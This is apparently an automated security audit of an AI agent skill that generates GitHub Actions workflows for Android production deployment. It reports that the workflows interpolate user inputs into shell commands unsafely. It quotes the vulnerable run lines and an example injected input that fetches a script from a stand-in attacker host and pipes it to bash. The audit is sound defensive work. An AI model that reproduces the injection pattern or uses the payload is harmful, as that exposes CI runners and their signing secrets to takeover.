android-workflow-production
Pass
Audited by Gen Agent Trust Hub on Feb 28, 2026
Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The generated GitHub Actions workflows (
deploy-production.ymlandmanage-rollout.yml) directly interpolate user-provided inputs into shell commands, creating a command injection vulnerability. - Evidence:
run: bundle exec fastlane deploy_production rollout:${{ github.event.inputs.rollout_percentage }}in.github/workflows/deploy-production.yml. - Evidence:
run: bundle exec fastlane increase_rollout rollout:${{ github.event.inputs.percentage }}in.github/workflows/manage-rollout.yml. - Risk: An attacker with permissions to trigger manual workflows could execute arbitrary code on the runner by providing malicious input such as
1.0; curl http://attacker.com/exploit.sh | bash. - [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by generating automation code that fails to sanitize external data entering the agent's execution context.
- Ingestion points:
github.event.inputs.rollout_percentageandgithub.event.inputs.percentagefields within the generated YAML workflows. - Boundary markers: Absent. The inputs are not enclosed in delimiters or validated against a strict regex/schema before use.
- Capability inventory: The generated workflows have the capability to execute shell commands via
bundle exec, access repository secrets (including signing keys and service accounts), and interact with the GitHub API. - Sanitization: Absent. The skill provides no logic to escape or validate the input strings before they are executed in a shell context.
Audit Metadata